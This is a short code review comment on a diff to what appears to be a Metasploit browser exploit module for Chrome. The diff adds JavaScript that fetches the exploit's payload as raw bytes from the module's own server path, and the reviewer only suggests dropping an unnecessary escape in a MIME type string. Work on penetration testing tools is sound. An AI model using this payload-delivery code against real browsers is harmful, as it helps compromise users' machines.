modules/exploits/multi/browser/chrome_object_create.rb

```diff
@@ -234,6 +262,33 @@ def on_request_uri(cli, request)
       return new WebAssembly.Instance(new WebAssembly.Module(buffer),{});
     }
 
+    var req = new XMLHttpRequest();
+    req.open('GET', '#{uripath}payload', false);
+    req.overrideMimeType('text\/plain; charset=x-user-defined');
```

Comment:
Escaping seems unnecessary.

```suggestion
    req.overrideMimeType('text/plain; charset=x-user-defined');
```